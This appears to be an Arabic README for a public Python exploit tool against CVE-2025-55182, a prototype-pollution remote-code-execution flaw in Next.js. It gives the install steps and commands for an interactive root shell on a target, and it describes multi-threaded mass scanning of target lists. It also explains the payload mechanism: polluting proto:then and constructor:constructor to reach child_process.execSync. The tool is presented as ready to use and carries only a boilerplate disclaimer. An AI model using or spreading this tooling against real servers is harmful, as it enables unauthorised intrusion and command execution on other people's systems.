
أداة استغلال CVE-2025-55182 – استغلال Python 2.7 لثغرة تلوث النموذج الأولي في Next.js مما يؤدي إلى RCE
استغلال مكتوب بلغة Python 2.7 لثغرة CVE-2025-55182 – وهي ثغرة حرجة من نوع تلوّث النموذج الأولي (Prototype Pollution) / تنفيذ الأوامر عن بُعد (RCE) في تطبيقات Next.js.
تتيح هذه الأداة كلاً من الغلاف التفاعلي لهدف واحد والفحص الجماعي لعدة مضيفين، مع تعدد الخيوط، ومخرجات ملوّنة، واحتياط تلقائي إلى HTTPS.
https:// إذا لم يُحدَّد بروتوكولid إلى أي أمر (whoami, ls, وغيرها)requests (سهلة التثبيت)requests – ثبّتها باستخدام:
pip install requests
· طرفية تدعم ألوان ANSI (معظم طرفيات Linux/macOS، وWindows Terminal، وPowerShell)
📦 التثبيت
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
اجعل السكربت قابلاً للتنفيذ (اختياري):
chmod +x CVE-2025-55182.py
🎯 الاستخدام
python2 CVE-2025-55182.py https://target.com
أو بدون بروتوكول (يُضاف HTTPS تلقائيًا):
python2 CVE-2025-55182.py target.com
بمجرد الاتصال والتأكد من وجود الثغرة، ستحصل على موجه أوامر الغلاف:
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
الأوامر المدمجة:
· exit / quit – إغلاق الغلاف · clear – مسح الشاشة · help – إظهار المساعدة
جهّز ملفًا يحتوي هدفًا واحدًا في كل سطر (مع أو بدون http/https):
targets.txt
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
شغّل الفحص الجماعي (الافتراضي: 10 خيوط، الأمر id، ملف الإخراج res.txt):
python2 CVE-2025-55182.py targets.txt
خصّص عدد الخيوط والأمر وملف الإخراج:
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
· 20 – عدد الخيوط · whoami – الأمر الذي سيُنفَّذ على كل هدف مصاب · results.txt – ملف الإخراج (تُحفظ الإدخالات المصابة فقط)
مثال على مخرجات الفحص الجماعي:
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt
[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
Status: 303
Output: uid=0(root) gid=0(root) groups=0(root)
[-] NOT VULNERABLE: https://example.com
...
النتائج المحفوظة (res.txt):
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
🧪 كيف تعمل الأداة
يُرْسِل الاستغلال طلبًا مُصنَّعًا من نوع multipart/form-data إلى نقطة نهاية في تطبيق Next.js (يُضاف /login إذا كان المسار فارغًا). يستغل تلوّث النموذج الأولي (proto:then و constructor:constructor) لحقن بادئة خبيثة تنفّذ أمر نظام باستخدام child_process.execSync().
يستجيب الخادم بإعادة توجيه 303 تحتوي على مخرجات الأمر في الترويسة x-action-redirect (أو Location). تستخرج الأداة النتيجة من /login?a=.
🛡️ إخلاء المسؤولية
هذه الأداة مخصّصة للأغراض التعليمية واختبارات الأمان المصرّح بها فقط. الوصول غير المصرّح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر ينجم عن هذا البرنامج. يجب أن تحصل على إذن كتابي صريح من مالك النظام المستهدف قبل استخدام هذا الاستغلال.
لمزيد من إخلاء المسؤولية، يمكنك الاطلاع عليه في الملف الشخصي لـ Jenderal92. يمكنك التحقق منه هنا !!!